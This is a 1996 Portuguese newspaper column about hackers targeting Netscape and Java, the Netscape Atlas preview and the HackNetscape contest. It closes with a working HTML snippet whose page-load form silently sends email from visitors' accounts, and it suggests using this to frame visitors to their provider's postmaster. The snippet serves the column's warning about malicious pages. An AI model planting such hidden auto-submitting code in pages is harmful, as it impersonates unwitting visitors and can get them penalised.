O GLOBO - Informática Etc. - Carlos Alberto Teixeira
Artigo: 243 - Escrito em: 1996-04-08 - Publicado em: 1996-04-22


Aves de rapina à solta


É só um fabricante despontar no mercado, fazendo sucesso pra valer, e lá se vão os urubús procurar falhas no software e buracos onde possam penetrar e causar danos. Mas o mundo virtual imita o mundo real, portanto não poderia ser de outra maneira.

O que vemos nesses tempos é a Web crescendo desmesuradamente e o Java se firmando como padrão. E tome gente explorando bugs e arranjando jeitinhos de derrubar o sistema. Mas tudo isso tem seu lado positivo, pois quanto mais urubús agindo, mais os fabricantes de software têm que rebolar para melhorar seus produtos. Os vândalos fizeram até virus que se enfiam em aplicações Java. Como resposta, a turma da Symantec Corp. não deixou a peteca cair e desenvolveu rapidinho um detetor de virus em Java-nativo (maiores informações em http://www.symantec.com).

Apenas um parêntese, já que estamos falando em Netscape. Muitos já estão sabendo que a Netscape está oferecendo um "preview" de uma nova versão do Netscape Navigator, chamada Atlas. Você pode obter o cliente Atlas para Windows (3.1X, 95 ou NT), Mac e Unix. Os arquivinhos são meio grandes, o do Windows 3.1, por exemplo, é um auto-extraível de quase 4,5 megas. O Atlas oferece visualizador VRML (Virtual Reality Modeling Language) embutido, playback interno para diversos tipos de arquivos de audio, plug-in de video AVI para animações em documentos HTML, suporte para phone e chat, suporte a Java, opções avançadas de mail e Usenet news, cores de fundo para células de tabelas e navegação avançada baseada em frames. Convém mirar seu browser para http://home.mcom.com/comprod/products/navigator/atlas/index.html. Se quiser baixar logo o software via FTP, o endereço é: ftp://ftp.netscape.com/pub/navigator/atlas/pr1. Fecho parêntese.

A atividade dos hackers é tão intensa que já existem até grupos especializados. Se a leitora é chegada ao assunto, encontrará na soberba coleção dos "oleBuzzeard's HPA Links" em http://iti2.net/k0p/hpawebsites.html, um certo site muito interessante: pertence a uma equipe de fuxiqueiros dedicados exclusivamente a hackear o Netscape. Chama-se Community ConneXion's e atende no URL http://www.c2.org/hacknetscape.

A última dessa cambada é a promoção de um concurso que distribui T-shirts espertas para quem tirar vantagem dos furos no Netscape. O projeto HackNetscape é patrocinado pela própria Community ConneXion, uma "entidade" que luta pela adoção de criptografia pesada na Internet, alegando que um falso senso de segurança é a mesma coisa que a falta completa de segurança. Eles apontam que a Netscape foi obrigada a usar um algoritmo capenga de criptografia, em função das restrições à exportação impostas pelo governo dos EUA. (Se não sabe do que estamos falando, preste atenção à telinha de abertura do Atlas, com a mensagem de copyright da RSA Data Security Inc. informando que o software suporta os procedimentos "internacionais" de segurança da RSA Public Key Cryptography: MD2, MD5 e RC4.)

Você poderá encontrar na Community ConneXion links para os grandes desafios dos hackers do Netscape: os dois esforços mundiais de quebra de chaves criptográficas (HAL I e II), a quebra do RNG (Random Number Generator) do Netscape 1.1, a exploração do famoso bug de "buffer overflow" (este furo ainda está inexplorado), do buraco no servidor Windows NT e das brechas de segurança no JavaScript (aquelas que permitem ao site Web saber um monte de coisas a seu respeito sem você perceber). Se quiser participar destes ataques maciços, consulte a página dos caras para saber das regras em detalhe.


BOMBINHA: E já que estamos falando em furos, gostaria de aterrorizar a leitora com um cenário hipotético. Imagine que você amanhã cedo tenta se logar no seu provedor Internet e descobre que sua conta foi cancelada. Você liga vox para lá e é informada que o motivo do cancelamento foi você ter enviado uma mensagem mal-educada para o administrador do sistema, chamando-o de corno e safado. Você cai da cadeira e começa a espernear descontrolada: afinal de contas você é uma jovem educada e jamais dirigiria tais ofensas via e-mail a ninguém. Mas e se você, sem saber, acessou uma home page maceteada de algum usuário espírito de porco? É possível uma coisa assim?

Se seu e-mail é josefina@pig.spirit.com.br, experimente colocar no código HTML da sua home page as seguintes linhazinhas:

<body onLoad="document.mailme.submit()">

<form method=post name="mailme" action="mailto:josefina@pig.spirit.com.br?subject=peguei">

<input type=hidden name="culpado" value="eu">

</form>

Cada vez que um incauto lhe visitar a home page, ele estará (sem saber) enviando e-mail para você, com Subject: "peguei" e corpo "culpado=eu". No caso, se você quisesse encrencar seus visitantes, bastaria endereçar a mensagem ao "Postmaster" e caprichar no teor do corpo da mensagem. Fica ilustrada a facilidade de se enfiar código maligno nessas páginas aparentemente tão inocentes que freqüentamos. E olhe que isso não é Java nem nada, é HTML simples e teimosa. Portanto, se você amanhecer cancelada, já sabe o que dizer ao Postmaster.


[ Voltar ]